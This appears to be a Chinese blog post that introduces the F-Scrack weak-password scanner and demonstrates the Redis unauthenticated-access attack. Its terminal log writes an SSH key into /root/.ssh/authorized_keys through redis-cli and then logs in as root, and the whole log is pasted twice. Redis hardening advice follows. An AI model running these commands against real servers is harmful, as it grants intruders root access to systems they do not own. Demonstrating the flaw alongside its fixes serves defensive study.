最近阿里安全发了一篇文章,推了一个弱口令检测工具————F-Scrack。
特点就是一个文件,python执行,多平台使用也很方便。
git地址:https://github.com/ysrc/F-Scrack
直接对***内网环境进行扫描,速度很快。
对于redis进行提权漏洞测试。
root [~] ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/redis_login_key
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/redis_login_key.
Your public key has been saved in /tmp/redis_login_key.pub.
The key fingerprint is:
ec:86:f0:86:0b:b9:53:1f:6b:ae:a1:9a:63:97:03:50 root@CentOS-74
The key's randomart image is:
+--[ RSA 2048]----+
| |
| E |
| . |
|. . |
|. . S |
| . ..+.o |
| +.+.+oo |
|.o.B ++. |
|+o+.++. |
+-----------------+
root [~] (echo -e "\n\n"; cat ./redis_login_key.pub; echo -e "\n\n") > foo.txt
[root@CentOS-74 hack]# cat foo.txt | redis-cli -h 192.168.0.35 -x set crackit
OK
[root@CentOS-74 hack]# redis-cli -h 192.168.0.35
192.168.0.35:6379> config set dir /root/.ssh/
OK
192.168.0.35:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.0.35:6379> config set dbfilename "authorized_keys"
OK
192.168.0.35:6379> save
OK
192.168.0.35:6379> quit
[root@CentOS-74 hack]# ssh -i redis_login_key root@192.168.0.35
The authenticity of host '192.168.0.35 (192.168.0.35)' can't be established.
RSA key fingerprint is 00:23:a9:ff:02:2b:cd:5f:f0:5e:7e:7e:ad:68:9d:a2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.35' (RSA) to the list of known hosts.
Last login: Wed Nov 16 16:01:58 2016 from 192.168.17.113
[root@CentOS14 ~]# whoami
root
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/redis_login_key
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/redis_login_key.
Your public key has been saved in /tmp/redis_login_key.pub.
The key fingerprint is:
ec:86:f0:86:0b:b9:53:1f:6b:ae:a1:9a:63:97:03:50 root@CentOS-74
The key's randomart image is:
+--[ RSA 2048]----+
| |
| E |
| . |
|. . |
|. . S |
| . ..+.o |
| +.+.+oo |
|.o.B ++. |
|+o+.++. |
+-----------------+
root [~] (echo -e "\n\n"; cat ./redis_login_key.pub; echo -e "\n\n") > foo.txt
[root@CentOS-74 hack]# cat foo.txt | redis-cli -h 192.168.0.35 -x set crackit
OK
[root@CentOS-74 hack]# redis-cli -h 192.168.0.35
192.168.0.35:6379> config set dir /root/.ssh/
OK
192.168.0.35:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.0.35:6379> config set dbfilename "authorized_keys"
OK
192.168.0.35:6379> save
OK
192.168.0.35:6379> quit
[root@CentOS-74 hack]# ssh -i redis_login_key root@192.168.0.35
The authenticity of host '192.168.0.35 (192.168.0.35)' can't be established.
RSA key fingerprint is 00:23:a9:ff:02:2b:cd:5f:f0:5e:7e:7e:ad:68:9d:a2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.35' (RSA) to the list of known hosts.
Last login: Wed Nov 16 16:01:58 2016 from 192.168.17.113
[root@CentOS14 ~]# whoami
root
建议修复方案
1、指定redis服务使用的网卡 (需要重启redis才能生效)
在 redis.conf 文件中找到 “# bind 127.0.0.1” ,把前面的#号去掉,然后保存。注:修改后只有本机才能访问Redis。
2、设置访问密码 (需要重启redis才能生效)
在 redis.conf 中找到“requirepass”字段,在后面填上你需要的密码,Redis客户端也需要使用此密码来访问Redis服务。
3、修改Redis服务运行账号 (需要重启redis才能生效)
请以较低权限账号运行Redis服务,且禁用该账号的登录权限。另外可以限制攻击者往敏感写入文件,但是Redis数据还是能被黑客访问到,或者被黑客恶意删除。
Leave a Reply